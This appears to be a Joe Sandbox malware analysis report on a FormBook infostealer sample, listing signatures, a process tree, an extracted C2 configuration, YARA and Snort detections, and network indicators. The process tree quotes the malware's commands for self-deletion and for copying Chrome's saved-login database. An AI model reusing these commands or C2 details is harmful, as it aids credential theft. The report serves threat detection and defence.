Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report MV ROCKET_PDA.exe

Overview

General Information

Sample Name:MV ROCKET_PDA.exe
Analysis ID:499380
MD5:754d58f597c5947d64269ad73f3e38fe
SHA1:abd09f3ed17e77b7dff4a57e465d8d79af7ab9ea
SHA256:86aab91018b32a9ee913459090b66fe44f00e625f05560483547ad39d542a61b
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • MV ROCKET_PDA.exe (PID: 7032 cmdline: 'C:\Users\user\Desktop\MV ROCKET_PDA.exe' MD5: 754D58F597C5947D64269AD73F3E38FE)
    • MV ROCKET_PDA.exe (PID: 7068 cmdline: 'C:\Users\user\Desktop\MV ROCKET_PDA.exe' MD5: 754D58F597C5947D64269AD73F3E38FE)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 1744 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 5368 cmdline: /c del 'C:\Users\user\Desktop\MV ROCKET_PDA.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6464 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 5jsdph8p9l_r.exe (PID: 7056 cmdline: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe MD5: 754D58F597C5947D64269AD73F3E38FE)
          • 5jsdph8p9l_r.exe (PID: 1280 cmdline: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe MD5: 754D58F597C5947D64269AD73F3E38FE)
        • 5jsdph8p9l_r.exe (PID: 4024 cmdline: 'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe' MD5: 754D58F597C5947D64269AD73F3E38FE)
          • 5jsdph8p9l_r.exe (PID: 2064 cmdline: 'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe' MD5: 754D58F597C5947D64269AD73F3E38FE)
        • 5jsdph8p9l_r.exe (PID: 4748 cmdline: 'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe' MD5: 754D58F597C5947D64269AD73F3E38FE)
          • 5jsdph8p9l_r.exe (PID: 5572 cmdline: 'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe' MD5: 754D58F597C5947D64269AD73F3E38FE)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.geefmijcorona.online/nqn4/"], "decoy": ["posadaluna.com", "ztwl2000.com", "cvmu.net", "marvellouslles.com", "tiromiesu.com", "allinsqadminn.com", "8straps.com", "buyfood.store", "jipodh.xyz", "earthsidesoulalchemist.com", "overiodize.xyz", "weed.enterprises", "minuseasy.com", "konchord.com", "14attrayanteoffre.com", "brasbux.com", "aog.group", "hairuno.com", "solheimdesign.com", "cosmetictreat.com", "datingperformance.website", "woaini.website", "totusnet.com", "palisadestahoeresorts.com", "judoclubalbigny.com", "positivethingsbymarion.com", "ejezeta3d.com", "viar.website", "qgt114.com", "trust-top.net", "diet-health-and-beauty.tech", "anytimedryout.com", "lexhire.com", "blazingfastcredit.com", "serenityminded.com", "retirees-aa.net", "futurehumandesign.net", "92clavelcourt.com", "primaryblohtw.top", "alhudadevelopers.com", "evertownnyc.net", "storyconnect.tech", "minecrafttop.net", "wordofgod.xyz", "cmledbetter.com", "dromenvangers.com", "thedelawarekeys.com", "perfectionbyinjection.com", "dehn-sso.com", "alltagsentlastung.com", "poradniabioetyczna.com", "ayushigangwar.com", "stlaurenthp.com", "alsafi.website", "lkdwaterfowlers.com", "needaletterforfreedom.com", "eco1tnpasumo3.xyz", "lawsonboards.com", "unapologeticlyme.net", "hoshikuzu-hegemony.com", "notedinvestment.website", "ebikerating.com", "bigbrostudios.com", "ansisms.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000000.300351078.000000000D4A4000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000000.300351078.000000000D4A4000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000000.300351078.000000000D4A4000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x6b18:$sqlite3text: 68 38 2A 90 C5
    • 0x6c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
    00000025.00000002.755075505.000000000E800000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000025.00000002.755075505.000000000E800000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 49 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      41.2.5jsdph8p9l_r.exe.e800000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        41.2.5jsdph8p9l_r.exe.e800000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        41.2.5jsdph8p9l_r.exe.e800000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
        • 0x16b18:$sqlite3text: 68 38 2A 90 C5
        • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
        1.2.MV ROCKET_PDA.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.MV ROCKET_PDA.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 51 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1744
          Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1744

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000025.00000002.755075505.000000000E800000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.geefmijcorona.online/nqn4/"], "decoy": ["posadaluna.com", "ztwl2000.com", "cvmu.net", "marvellouslles.com", "tiromiesu.com", "allinsqadminn.com", "8straps.com", "buyfood.store", "jipodh.xyz", "earthsidesoulalchemist.com", "overiodize.xyz", "weed.enterprises", "minuseasy.com", "konchord.com", "14attrayanteoffre.com", "brasbux.com", "aog.group", "hairuno.com", "solheimdesign.com", "cosmetictreat.com", "datingperformance.website", "woaini.website", "totusnet.com", "palisadestahoeresorts.com", "judoclubalbigny.com", "positivethingsbymarion.com", "ejezeta3d.com", "viar.website", "qgt114.com", "trust-top.net", "diet-health-and-beauty.tech", "anytimedryout.com", "lexhire.com", "blazingfastcredit.com", "serenityminded.com", "retirees-aa.net", "futurehumandesign.net", "92clavelcourt.com", "primaryblohtw.top", "alhudadevelopers.com", "evertownnyc.net", "storyconnect.tech", "minecrafttop.net", "wordofgod.xyz", "cmledbetter.com", "dromenvangers.com", "thedelawarekeys.com", "perfectionbyinjection.com", "dehn-sso.com", "alltagsentlastung.com", "poradniabioetyczna.com", "ayushigangwar.com", "stlaurenthp.com", "alsafi.website", "lkdwaterfowlers.com", "needaletterforfreedom.com", "eco1tnpasumo3.xyz", "lawsonboards.com", "unapologeticlyme.net", "hoshikuzu-hegemony.com", "notedinvestment.website", "ebikerating.com", "bigbrostudios.com", "ansisms.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: MV ROCKET_PDA.exeVirustotal: Detection: 37%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 41.2.5jsdph8p9l_r.exe.e800000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MV ROCKET_PDA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 40.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.5jsdph8p9l_r.exe.e820000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 41.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 38.2.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.5jsdph8p9l_r.exe.e820000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 38.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 37.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 40.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 38.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.2.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.300351078.000000000D4A4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.755075505.000000000E800000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.279433578.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000002.754112102.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000028.00000002.778458695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.799581711.00000000011C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000002.793073611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326284142.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000001.751913431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000028.00000001.775791090.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326230897.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000029.00000002.793993652.000000000E800000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.801537321.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000027.00000002.780001477.000000000E820000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000001.790583041.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsv161C.tmp\lqnx.dllAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\AppData\Local\Temp\nsy35E9.tmp\lqnx.dllAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\AppData\Local\Temp\nsfEE22.tmp\lqnx.dllAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp\lqnx.dllAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
          Machine Learning detection for sampleShow sources
          Source: MV ROCKET_PDA.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsv161C.tmp\lqnx.dllJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\nsy35E9.tmp\lqnx.dllJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\nsfEE22.tmp\lqnx.dllJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp\lqnx.dllJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\Gw4n\5jsdph8p9l_r.exeJoe Sandbox ML: detected
          Source: 40.1.5jsdph8p9l_r.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 39.2.5jsdph8p9l_r.exe.e820000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.MV ROCKET_PDA.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 41.2.5jsdph8p9l_r.exe.e800000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 42.1.5jsdph8p9l_r.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 38.2.5jsdph8p9l_r.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 42.2.5jsdph8p9l_r.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 13.2.rundll32.exe.3754408.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 37.2.5jsdph8p9l_r.exe.e800000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 13.2.rundll32.exe.584796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.1.MV ROCKET_PDA.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 40.2.5jsdph8p9l_r.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 38.1.5jsdph8p9l_r.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: MV ROCKET_PDA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: MV ROCKET_PDA.exe, 00000000.00000003.274631423.000000000E810000.00000004.00000001.sdmp, MV ROCKET_PDA.exe, 00000001.00000002.326762800.0000000000B9F000.00000040.00000001.sdmp, rundll32.exe, 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp, 5jsdph8p9l_r.exe, 00000025.00000003.749220704.000000000E9D0000.00000004.00000001.sdmp, 5jsdph8p9l_r.exe, 00000026.00000002.755084179.0000000000ADF000.00000040.00000001.sdmp, 5jsdph8p9l_r.exe, 00000027.00000003.774246170.000000000E860000.00000004.00000001.sdmp, 5jsdph8p9l_r.exe, 00000028.00000002.778988357.0000000000B0F000.00000040.00000001.sdmp, 5jsdph8p9l_r.exe, 00000029.00000003.788779918.000000000E9D0000.00000004.00000001.sdmp, 5jsdph8p9l_r.exe, 0000002A.00000002.793729863.0000000000AEF000.00000040.00000001.sdmp
          Source: Binary string: C:\xampp\htdocs\Loct\a907f411f4a1406680de5d21c8d82345\Loader\oocazquc\Release\oocazquc.pdb source: MV ROCKET_PDA.exe, 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp, 5jsdph8p9l_r.exe, 00000025.00000002.752407520.0000000000409000.00000004.00020000.sdmp, 5jsdph8p9l_r.exe, 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp, 5jsdph8p9l_r.exe, 00000029.00000002.791582542.0000000000409000.00000004.00020000.sdmp, lqnx.dll.39.dr
          Source: Binary string: wntdll.pdb source: 5jsdph8p9l_r.exe, 5jsdph8p9l_r.exe, 00000029.00000003.788779918.000000000E9D0000.00000004.00000001.sdmp, 5jsdph8p9l_r.exe, 0000002A.00000002.793729863.0000000000AEF000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdb source: MV ROCKET_PDA.exe, 00000001.00000002.326381141.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: MV ROCKET_PDA.exe, 00000001.00000002.326381141.0000000000A60000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0105FAA0 FindFirstFileW,FindNextFileW,FindClose,13_2_0105FAA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0105FA99 FindFirstFileW,FindNextFileW,FindClose,13_2_0105FA99
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 39_2_00405EC2 FindFirstFileA,FindClose,39_2_00405EC2
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 39_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,39_2_004054EC
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 39_2_00402671 FindFirstFileA,39_2_00402671
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 4x nop then pop ebx1_2_00406AB8
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 4x nop then pop ebx1_2_00406AE2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 4x nop then pop edi1_2_00415626
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 4x nop then pop edi1_2_00415680
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 4x nop then pop esi1_2_004157D6
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 4x nop then pop esi1_2_004157AD
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 4x nop then pop ebx1_1_00406AB8
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 4x nop then pop ebx1_1_00406AE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop ebx13_2_01056AB9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop ebx13_2_01056AB9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop esi13_2_010657AD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop esi13_2_010657D6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi13_2_01065626
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi13_2_01065680

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49829 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49829 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49829 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 198.37.103.70:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 198.37.103.70:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 198.37.103.70:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49864 -> 155.159.216.37:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49864 -> 155.159.216.37:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49864 -> 155.159.216.37:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49866 -> 167.172.158.202:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49866 -> 167.172.158.202:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49866 -> 167.172.158.202:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49876 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49876 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49876 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49877 -> 66.96.147.118:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49877 -> 66.96.147.118:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49877 -> 66.96.147.118:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49880 -> 155.159.216.37:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49880 -> 155.159.216.37:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49880 -> 155.159.216.37:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.stlaurenthp.com
